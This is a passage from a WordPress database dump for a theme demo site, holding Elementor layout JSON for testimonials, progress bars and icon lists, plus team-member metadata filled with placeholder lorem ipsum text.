"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cec45ef\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b02bbc3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2a1696a\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5978ece\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"49a8f99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"94307b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"dfa29c0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a9753bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2bb252b\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"ebc310d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d308ac2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"51606ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f1abbd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4ae5e4e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"3802903\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"db13835\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fd33b43\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50969ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dd5a46e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(2347,4656,'_elementor_page_assets','a:0:{}'),(2348,4656,'_wxr_import_has_attachment_refs','1'),(2349,4657,'ova_team_met_avatar_id','921'),(2350,4657,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg'),(2351,4657,'ova_team_met_job','Architecture'),(2352,4657,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:19:\"https://twitter.com\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:40:\"https://www.facebook.com/ovatheme.envato\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:25:\"https://www.pinterest.com\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:25:\"https://www.instagram.com\";}}'),(2353,4657,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\nLorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.\r\n\r\nIf you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.'),(2354,4657,'ova_team_met_order_team','1'),(2355,4657,'_elementor_edit_mode','builder'),(2356,4657,'_elementor_template_type','wp-post'),(2357,4657,'_elementor_version','3.6.6'),(2358,4657,'_wp_page_template','default'),(2359,4657,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8dffc21\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"64db9d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"a272d89\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72b0264\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"097c6c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"bcfb858\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c89147\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d8cf87d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3ca0de\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"d1a9295\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"807dfde\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9fe7239\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"682b6ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f17e180\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"44bef5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"13d4194\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4feef43\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6fd75c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c06dabc\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas 